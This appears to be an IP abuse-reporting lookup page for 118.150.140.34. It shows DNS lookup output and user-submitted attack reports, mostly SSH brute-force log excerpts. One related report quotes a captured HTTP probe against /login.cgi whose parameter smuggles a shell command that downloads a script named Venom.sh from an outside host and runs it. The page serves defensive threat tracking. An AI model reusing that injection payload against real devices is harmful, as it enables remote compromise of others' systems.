118.150.140.34

Basic Info

City: unknown

Region: unknown

Country: Taiwan, China

Internet Service Provider: Chief Telecom Inc.

Hostname: unknown

Organization: unknown

Usage Type: Data Center/Web Hosting/Transit

Comments:

Make a comment on this IP

Type	Details	Datetime
attackspam	Honeypot attack, port: 81, PTR: n140-h34.150.118.dynamic.da.net.tw.	2020-03-05 02:23:44

Comments on same subnet:

IP	Type	Details	Datetime
118.150.140.229	attack	Port probing on unauthorized port 88	2020-06-04 17:14:11

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 118.150.140.34
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 6301
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;118.150.140.34.			IN	A

;; AUTHORITY SECTION:
.			153	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020030401 1800 900 604800 86400

;; Query time: 93 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Mar 05 02:23:41 CST 2020
;; MSG SIZE  rcvd: 118

Host info

34.140.150.118.in-addr.arpa domain name pointer n140-h34.150.118.dynamic.da.net.tw.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
34.140.150.118.in-addr.arpa	name = n140-h34.150.118.dynamic.da.net.tw.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
222.112.107.46	attack	12/23/2019-07:19:09.586116 222.112.107.46 Protocol: 6 ET SCAN NMAP -sS window 1024	2019-12-23 20:26:00
118.48.211.197	attack	Dec 23 13:03:39 silence02 sshd[3991]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.48.211.197 Dec 23 13:03:41 silence02 sshd[3991]: Failed password for invalid user host from 118.48.211.197 port 42940 ssh2 Dec 23 13:10:05 silence02 sshd[4146]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.48.211.197	2019-12-23 20:25:15
171.251.49.194	attackspam	Attempt to attack host OS, exploiting network vulnerabilities, on 23-12-2019 06:25:10.	2019-12-23 20:45:31
185.136.163.107	attackspambots	2019-12-23 05:28:07.425 [7065] SMTP protocol error in "AUTH LOGIN" H=(ADMIN) [185.136.163.107]:50821 AUTH command used when not advertised	2019-12-23 20:09:45
222.186.173.238	attack	Dec 23 13:40:21 sd-53420 sshd\[30416\]: User root from 222.186.173.238 not allowed because none of user's groups are listed in AllowGroups Dec 23 13:40:22 sd-53420 sshd\[30416\]: Failed none for invalid user root from 222.186.173.238 port 23416 ssh2 Dec 23 13:40:22 sd-53420 sshd\[30416\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.173.238 user=root Dec 23 13:40:24 sd-53420 sshd\[30416\]: Failed password for invalid user root from 222.186.173.238 port 23416 ssh2 Dec 23 13:40:28 sd-53420 sshd\[30416\]: Failed password for invalid user root from 222.186.173.238 port 23416 ssh2 ...	2019-12-23 20:46:58
92.63.194.148	attackspam	firewall-block, port(s): 22414/tcp, 22651/tcp, 22653/tcp	2019-12-23 20:34:03
118.25.104.48	attackspam	Invalid user revheim from 118.25.104.48 port 23586 pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.25.104.48 Failed password for invalid user revheim from 118.25.104.48 port 23586 ssh2 Invalid user quddls from 118.25.104.48 port 11409 pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.25.104.48	2019-12-23 20:17:30
190.85.15.251	attack	Dec 23 09:52:27 work-partkepr sshd\[7202\]: Invalid user komb from 190.85.15.251 port 56153 Dec 23 09:52:27 work-partkepr sshd\[7202\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.85.15.251 ...	2019-12-23 20:48:16
94.23.218.74	attackbots	Dec 23 13:10:34 srv01 sshd[24208]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=94.23.218.74 user=root Dec 23 13:10:35 srv01 sshd[24208]: Failed password for root from 94.23.218.74 port 42244 ssh2 Dec 23 13:15:08 srv01 sshd[24550]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=94.23.218.74 user=root Dec 23 13:15:11 srv01 sshd[24550]: Failed password for root from 94.23.218.74 port 43846 ssh2 Dec 23 13:19:47 srv01 sshd[24844]: Invalid user chivas from 94.23.218.74 port 45364 ...	2019-12-23 20:28:03
198.228.145.150	attackspam	Dec 23 12:50:17 lnxmysql61 sshd[11010]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=198.228.145.150 Dec 23 12:50:20 lnxmysql61 sshd[11010]: Failed password for invalid user rpc from 198.228.145.150 port 42920 ssh2 Dec 23 12:54:50 lnxmysql61 sshd[11179]: Failed password for root from 198.228.145.150 port 45266 ssh2	2019-12-23 20:07:36
129.204.152.222	attack	Dec 23 12:47:52 localhost sshd\[19835\]: Invalid user paige from 129.204.152.222 port 55794 Dec 23 12:47:52 localhost sshd\[19835\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.204.152.222 Dec 23 12:47:54 localhost sshd\[19835\]: Failed password for invalid user paige from 129.204.152.222 port 55794 ssh2	2019-12-23 20:10:36
51.158.120.115	attack	Dec 23 13:46:42 vibhu-HP-Z238-Microtower-Workstation sshd\[8374\]: Invalid user n-yamaguchi from 51.158.120.115 Dec 23 13:46:42 vibhu-HP-Z238-Microtower-Workstation sshd\[8374\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.158.120.115 Dec 23 13:46:44 vibhu-HP-Z238-Microtower-Workstation sshd\[8374\]: Failed password for invalid user n-yamaguchi from 51.158.120.115 port 39700 ssh2 Dec 23 13:51:57 vibhu-HP-Z238-Microtower-Workstation sshd\[8665\]: Invalid user etholen from 51.158.120.115 Dec 23 13:51:57 vibhu-HP-Z238-Microtower-Workstation sshd\[8665\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.158.120.115 ...	2019-12-23 20:42:57
81.183.146.157	attackspambots	Sniffing for wp-login	2019-12-23 20:28:41
197.37.239.47	attack	1 attack on wget probes like: 197.37.239.47 - - [22/Dec/2019:12:51:05 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 20:07:54
103.248.146.10	attack	1577082323 - 12/23/2019 07:25:23 Host: 103.248.146.10/103.248.146.10 Port: 445 TCP Blocked	2019-12-23 20:32:58

Recently Reported IPs

46.8.57.120	51.75.208.179	45.32.47.119	23.225.151.109
3.1.201.108	23.160.192.247	185.23.127.231	201.130.105.138
192.241.229.252	219.157.134.113	192.241.224.49	165.22.209.24
219.156.59.223	192.241.219.30	192.241.216.147	179.217.190.15
117.132.151.28	223.206.229.235	220.255.120.15	85.216.192.1